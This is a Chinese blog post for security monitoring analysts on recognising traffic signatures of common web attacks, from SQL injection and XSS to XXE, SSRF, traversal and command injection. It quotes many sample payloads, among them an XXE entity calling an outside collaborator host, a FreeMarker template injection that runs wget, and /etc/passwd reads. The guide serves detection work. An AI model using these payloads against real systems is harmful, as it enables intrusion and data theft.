常见漏洞的流量特征

news2024/12/25 8:56:32

 

1、SQL注入漏洞

 查看url / Referer字段/User-Agent字段/cookie字段

  1. 出现一些特殊字符(eg:单引号【‘】、双引号【“”】、括号【()】、单引号括号【‘(】、双引号括号【“(】等一些常见的特殊的字符);

      eg:http://localhost/index.php/?id=1'and+1=1--+

eg:http://localhost/index.php/?id=1 and 1=1 -- -和1 and 1=2 --+

 

  1. 出现SQL命令/语句(增加、删除、修改、查询语句或者各语句之间的串接)

eg:url/?id=1"  and  updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) -- -

eg:url/?id=-1' union select 1,group_concat(schema_name),3 from  information_schema.schemata --+

 

  1. 出现注释符号(在语句的最后出现连续2个减号字元 -- 后的    文字为注解,或“/*”与“*/”所包起来的文字为注解)

 

  1. 在url上出现万能密码字段  'or'1'='1

 

  1. 出现常见的特殊函数

  database()、updatexml()、extractvalue()、group_concat()、concat()、limit()、order by()、unsion()、system_user()、version()、load_file()、seelp()、length()、exp()、group by()、substr()、and、or等函数。

 

eg:?id=1” and updatexml(1,concat(0x7e,database()),3) --+

eg:?id=-1’ union select 1,2,seelp(5)--+

eg:1” union select updatexml(1,concat(0x7e,(select     group_concat(username) from users)),1) #

  1. 出现各种编码(eg:url编码,base64编码等)可利用Burp或 者在线解/编码器进行操作查看是否有特殊字段。
  2. user-agent字段出现sqlmap/1.0.8.15#dev (http://sqlmap.org)

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps1.jpg&pos_id=rbZyoezU

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps2.jpg&pos_id=2MWezksu

1.1 DNSlog注入

Load_file函数,功能是读取文件并返回文件内容为字符串。(访问互联网中的文件时,需要在最前面加上两个斜杠 //)

使用本函数有几个前提:
1、首先要有注入点
2、需要有root权限
3、数据库有读写权限即:secure_file_priv=“”
4、得有请求url权限
5、还必须得是windows服务器

 

concat函数

2、XSS(跨站脚本攻击)漏洞

查看url / Referer字段/User-Agent字段/cookie字段

查看是否出现以下各种标签(但不限于以下标签)

  1. 查看是否出现script标签<script>alert(1);</script>
  2. 查看是否出现img标签<img src=1 οnerrοr=alert(1);>
  3. 查看是否出现input标签<input οnfοcus=alert(1);>
  4. 查看是否出现svg 标签<svg οnlοad=alert(1);>
  5. 查看是否出现select 标签<select οnfοcus=alert(1)></select>
  6. 查看是否出现iframe 标签<iframe οnlοad=alert(1);></iframe>

 例如:

GET:/CuteSoft_Client/'"()&%<ScRiPt >prompt(994848)</ScRiPt>/SpellCheck.aspx HTTP/1.1  

Referer: http://emp.bcu.edu.cn/

GET /error_page.htm?flag='+alert('XSS')+' HTTP/1.1

<style type="text/javascript">alert('xss');</style>

<style>@import'javascript:alert("xss")';</style>

<link rel="stylesheet" href="http://ha.ckers.org/xss.css">  

  1. 这些标签里是否有一些危险函数【eval()函数、system()函数等】    或者直接出现这写标签后分析里面的语句看他要获取哪些信息。
  2. 若以上标签里的内容出现各种类型的编码、双写/大小写标签、各种特殊字符进行过滤都要着重看。
  3. user-agent字段出现 :     '%22()%26%25<ScRiPt%20>prompt(961668)</ScRiPt>

告警相关示例:

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps3.jpg&pos_id=6s5Pn9Ge

url   %0D%0A%3C%2Ftte%3E%3Cscript%3Ea ert%28myhd%29%3B%3C%2Fscpt%3E8au

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps4.jpg&pos_id=PlQ6Dnov

url解密出来的函数是恶意函数aert()以及script标签来获取账号

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps5.jpg&pos_id=c4gVwlWD

3、CSRF(跨站请求伪造)漏洞

查看Referer字段,正常来说,Referer字段应和请求的地址位于同一域名下。而如果是CSRF攻击传来的请求,Referer字段会是包含恶意网址的地址,不会在同一个域名下,这时候服务器就能识别出恶意的访问。所以在查看csrf告警时,看域名是否有相同的后缀,是否是来自本站

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps6.jpg&pos_id=cSVcnu1C

4、SSRF(服务器端请求伪造)漏洞

  1. 查看url上是否有file协议/gopher协议/ftp协议/dict协议

例  http://127.0.0.1/pikachu/vul/ssrf/ssrf_curl.php?url=file:///c:/windows/system.ini(获取本地c盘的system.ini文件)

  1. (查看url地址后面一些参数(share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain等)这些参数后面的值是不是内网的IP地址或者是127.0.0.1或者是一些协议的一些关键字眼。
  2. 这些参数值的后面是否有特殊字符(绕过ssrf会使用一些特殊字符eg:‘。’‘[: :]’等一些特殊的字符),也可能出现各种编码/进制进行写IP地址,或者特殊的域名eg:xip.io。
  3. 是否出现file_get_contents()、fsockopen()、curl_exec()等函数

5、XXE(外部实体注入)漏洞

  1. 若攻击报文出现一下告警,大概率是误报,因为这个是电信的L1接口定位采用的是xml格式的报文,所以会产生告警

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps7.jpg&pos_id=1jJjzx73

  1. 若报文中的system后面出现了url,要着重注意,(因为外部实体的声明使用SYSTEM关键字,并且必须指定一个URL,从该URL可以加载实体的值。)

例如:

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>

 

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>

 

<!DOCTYPE foo [ <!ENTITY ext SYSTEM "php://filter://path/to/file" ]>

 

   <!ENTITY lyq SYSTEM "file:///etc/passwd">

 

着重看以下3个协议

·data://协议    

·file://协议加文件上传    

·php://filter协议加文件上传

 

 

参考Content-Type字段的值,

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

Content-Type: text/xml;charset=utf-8

Accept字段

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

Accept=application/xml,text/xml,*/*;q=0.01

X-Requested-With字段

告警示例:

GET /meol/manage/web.config.bak HTTP/1.1

X-Requested-With:XMLHttpRequest

结合告警中是否有xml的payload,一般在告警最下面显示。

 

payload示例:

<?xml version="1.0"?>

<!DOCTYPE ANY [

    <!ENTITY % d SYSTEM

   "http://t606r6jh3sa4nrjus0ks29kwbnhe53.burpcollaborator.net">%d;

     ]>

<a>&xxe;</a>

总结:出现xml的文件或者后缀都着重看一下。

6、资源盗链漏洞

通过查看Referer字段或者签名,是否有外来网站,来源不是本站,只能通过Referer字段来进行判断,看是否有新的外来地址。着重看以http和https开头的网址。

7、目录遍历

   如果url上有大量的../../../../../../关键字符就有可能攻击者利用目录遍历来攻击,也要结合../后面是什么目录,若是敏感目录或者文件(例如:/etc/passwd、php后缀、conf后缀等)就要着重看一下,或者url上是各种编码,要进行解码进行查看内容

目录遍历漏洞的特征要注意:

?page=xxx.php  ?index=xxx.jsp    ?home=xxx.html   ?file=content      最终也要结合响应包进行最终确认是否攻击成功,是否响应。

告警示例:

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps8.jpg&pos_id=N4lz64mL

通过UTF-8解码之后再进行url解码得出

ba.online.sh.cn/../../../../../../../../../../../../../../../../../../../../etc/passwd

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps9.jpg&pos_id=mXjF70YX

8、命令执行注入

  1. 如果请求体或者url里出现以下危险函数

  【1】 php代码

system()、exec()、shell_exec()、passthru函数

popen函数  eval函数 assert()

【2】JSP代码

Runtime run = Runtime.getRuntime(); run.exec("ipconfig");

【3】ASP代码

<%Response.writeCreateObject("wscript.shell").exec("cmd.exe /c    ipconfig").StdOut.ReadAll%>

  1. 若里面还有特殊字符(|,||,&,&&,反符号` `,>,>>,< ,<<)
  2. 出现系统命令、系统目录、敏感文件等

相关告警示例:

GET /simple/tests/tmssql.php?do=phpinfo

GET /detail.php?id=/winnt/system32/cmd.exe?/c+dir+c:%5c

GET /cgi/maker/ptcmd.cgi?cmd=;cat+/tmp/config/usr.ini

GET /cgi/maker/ptcmd.cgi?cmd=;cat+/etc/passwd

8.1 freemaker模版注入

deviceUdid=${"freemarker.template.utility.Execute"?new()("wget http://downlo%6

<#assign test="freemarker.template.utility.Execute"?new()> ${test("open /Applications/Calculator.app")}

error=&deviceUdid=${"freemarker.template.utility.Exe%6

8.2  WinRAR远程代码执行漏洞分析

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps10.jpg&pos_id=mfPF2YK7

如果把响应代码更改为“301 Moved Permanently”,所有请求都将转到恶意域“attacker.com”,并且恶意域“attacker.com”会被缓存下来。缓存下来以后,所有到默认域“notifier.rarlab.com”的流量会重定向到恶意域“attacker.com”。

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml2912%5Cwps11.jpg&pos_id=Z5McbM8K

9、LDAP注入

定义

LDAP轻量级目录访问协议,是一种在线目录访问协议,主要用于目录中资源的搜索和查询。

如果出现一些运算符(=、|、||、&、&&、!(非)、*(通配符)等),因为这些运算符都是LDAP的基本语法。

例如:

ldap://austin.ibm.com/ou=Austin,o=IBM

ldap:///ou=Austin,o=IBM??sub?(cn=Joe Q. Public)

LDAP注入攻击面

(&(parameter1=value1)(parameter2=value2))

value1和value2可以换成注入代码

 

10、文件包含漏洞

文件包含会出现4个函数:

include()   include_once()   require()  require_once()

出现4个函数后结合响应体着重看一下

url也会出现特殊字符../../等特殊字符

一般文件包含和文件上传会结合使用。

11、文件上传漏洞

http 请求 Header 头部中的 Content-Type 存在以下特征:

multipart/form-data:表示该请求是一个文件上传请求

存在 boundary 字符串

POST 的内容存在以下特征: Content-Disposition name filename

 

查看文件的后缀是以.php  .php1~5  php的大小写或者.asp、.asp的大小写混合,或者以.htaccess结尾的,还有图片马要着重注意

 

12、信息泄露

配置文件访问

httpd.conf htaccess HTPASSWD boot.ini etc/passwd

Php.ini Web.xml等后缀文件,然后结合响应体查看是否响应

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1489335.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ansible执行速度慢问题解决过程

ansible执行速度慢问题解决过程 一、初见端倪二、问题分析三、解决问题更多技术博客,请关注微信公众号:运维之美 接到项目反馈,客户环境使用我们提供工具部署产品,在主机添加步骤卡了很久,实施同学没有办法,将问题上升给我们。 环境信息:kylin10 架构:arm 一、初见…

【NR 定位】3GPP NR Positioning 5G定位标准解读(四)

目录 前言 6 Signalling protocols and interfaces 6.1 支持定位操作的网络接口 6.1.1 通用LCS控制平面架构 6.1.2 NR-Uu接口 6.1.3 LTE-Uu接口 6.1.4 NG-C接口 6.1.5 NL1接口 6.1.6 F1接口 6.1.7 NR PC5接口 6.2 终端协议 6.2.1 LTE定位协议&#xff08;LPP&#x…

python二级常见题目

一.常见语法 jieba—第三方中文分词函数库 jieba—第三方中文分词函数库_jieba库函数-CSDN博客 Python基础——format格式化 Python基础——format格式化_python format-CSDN博客 format()方法的使用超全_format方法-CSDN博客 Python中random函数用法整理 Python中random…

如何在CentOS部署JumpServer堡垒机并实现无公网ip环境远程访问

文章目录 前言1. 安装Jump server2. 本地访问jump server3. 安装 cpolar内网穿透软件4. 配置Jump server公网访问地址5. 公网远程访问Jump server6. 固定Jump server公网地址 前言 JumpServer 是广受欢迎的开源堡垒机&#xff0c;是符合 4A 规范的专业运维安全审计系统。JumpS…

网络进程:广播、组播、流式域、报式域(套接字)

1.广播 1.1广播发送端模型(类似UDP客户端) 程序代码&#xff1a; #include<myhead.h> int main(int argc, const char *argv[]) {//创建套接字int sfdsocket(AF_INET,SOCK_DGRAM,0);if(sfd-1){perror("socket error");return -1;}//将套接字设置成允许广播i…

【金三银四】每日一点面试题(Java--JVM篇)

1、说一下 JVM 的主要组成部分及其作用&#xff1f; JVM&#xff08;Java虚拟机&#xff09;是Java程序运行的核心组件&#xff0c;它负责将Java字节码翻译成底层操作系统能够执行的指令。JVM由以下几个主要组成部分构成&#xff1a; 类加载器&#xff08;Class Loader&#…

【sgCollapseBtn】自定义组件:底部折叠/展开按钮

特性&#xff1a; 支持自定义折叠状态支持自定义标签名称 sgCollapseBtn源码 <template><div :class"$options.name" click"show !show" :placement"placement"><div class"collapse-btns"><div class"c…

9.WEB渗透测试-Linux基础知识-Linux用户权限管理(上)

免责声明&#xff1a;内容仅供学习参考&#xff0c;请合法利用知识&#xff0c;禁止进行违法犯罪活动&#xff01; 内容参考于&#xff1a; 易锦网校会员专享课 上一个内容&#xff1a;8.WEB渗透测试-Linux基础知识-Linux基础操作&#xff08;二&#xff09;-CSDN博客 用户管…

10个软件测试的吐槽点!

问题一&#xff1a;测试时间评估 这是一个工作日常经常需要回复的问题&#xff0c;理论上&#xff0c;测试这边要做出较科学合理的回复&#xff0c;那就要将【需求变更】、【开发进度延误】、【bug 修复不稳定】、【复杂业务流程】、【测试环境不稳定】、【上下游服务依赖】、…

Javase-类与对象

文章目录 一 . 面向过程的初步认知二 . 如何创建一个类三 . 如何创建一个对象四 . this引用五 . 构造方法六 . 初始化 一 . 面向过程的初步认知 Java是一门纯面向对象的语言(Object Oriented Program&#xff0c;简称OOP)&#xff0c;在面向对象的世界里&#xff0c;一切皆为对…

VUE3项目学习系列--项目配置(二)

在项目团队开发过程中&#xff0c;多人协同开发为保证项目格式书写格式统一标准化&#xff0c;因此需要进行代码格式化校验&#xff0c;包括在代码编写过程中以及代码提交前进行自动格式化&#xff0c;因此需要进行在项目中进行相关的配置使之代码格式一致。 一、eslint配置 …

http和https的区别是什么?

–前言 传输信息安全性不同、连接方式不同、端口不同、证书申请方式不同 一、传输信息安全性不同 1、http协议&#xff1a;是超文本传输协议&#xff0c;信息是明文传输。如果攻击者截取了Web浏览器和网站服务器之间的传输报文&#xff0c;就可以直接读懂其中的信息。 2、h…

微信小程序开发学习笔记《18》uni-app框架-网络请求与轮播图

微信小程序开发学习笔记《18》uni-app框架-网络请求 博主正在学习微信小程序开发&#xff0c;希望记录自己学习过程同时与广大网友共同学习讨论。建议仔细阅读uni-app对应官方文档 一、下载网络请求包 这个包是以前黑马程序员老师写的一个包&#xff0c;跟着课程学习&#x…

六、西瓜书——聚类

1.聚类任务 聚类是一种无监督学习&#xff0c;目标是通过对无标记训练样本的学习来揭示数据的内在性质及规律。聚类试图将数据集中的样本划分为若干个通常是不相交的子集,每个子集称为一个“簇”(cluster). 2.聚类度量 聚类性能度量亦称聚类“有效性指标”(validity index)。在…

07.IO流

07. IO流 01. 文件 1. 什么是文件 ​ 文件对我们并不陌生&#xff0c;文件是保存数据的地方&#xff0c;比如大家经常使用的word文档&#xff0c;txt文件&#xff0c;excel文件…都是文件。它既可以保存一张图片&#xff0c;可以保存视频&#xff0c;声音 2.文件流 ​ 文件…

【STA】多场景时序检查学习记录

单周期路径 建立时间时序检查 在时钟的有效沿到达触发器之前&#xff0c;数据应在一定时间内保持稳定&#xff0c;这段时间即触发器的建立 时间。满足建立时间要求将确保数据可靠地被捕获到触发器中。 建立时间检查是从发起触发器中时钟的第一个有效沿到捕获触发器中时钟后面…

【OJ】求和与计算日期

文章目录 1. 前言2. JZ64 求123...n2.1 题目分析2.2 代码 3. HJ73 计算日期到天数转换3.1 题目分析3.2 代码 4. KY222 打印日期4.1 题目分析4.2 代码 1. 前言 下面两个题目均来自牛客&#xff0c;使用的编程语言是c&#xff0c;分享个人的一些思路和代码。 2. JZ64 求123…n …

117.移除链表元素(力扣)

题目描述 代码解决 class Solution { public:ListNode* removeElements(ListNode* head, int val) {//删除头节点while(head!NULL&&head->valval){ListNode*tmphead;headhead->next;delete tmp;}//删除非头节点ListNode*curhead;while(cur!NULL&&cur-&g…

阿里云国际云解析DNS如何开启/关闭流量分析?

流量分析服务会涉及产生日志费用&#xff0c;所以开通内网DNS解析服务后&#xff0c;默认不会主动开启流量分析&#xff0c;需要您手动开启流量分析。对于未开启流量分析的用户&#xff0c;进入界面会提示您展示的都是模拟数据&#xff0c;您可以点击开启流量分析服务&#xff…

Vue+SpringBoot打造城市桥梁道路管理系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块三、系统展示四、核心代码4.1 查询城市桥梁4.2 新增城市桥梁4.3 编辑城市桥梁4.4 删除城市桥梁4.5 查询单个城市桥梁 五、免责说明 一、摘要 1.1 项目介绍 基于VueSpringBootMySQL的城市桥梁道路管理系统&#xff0c;支持…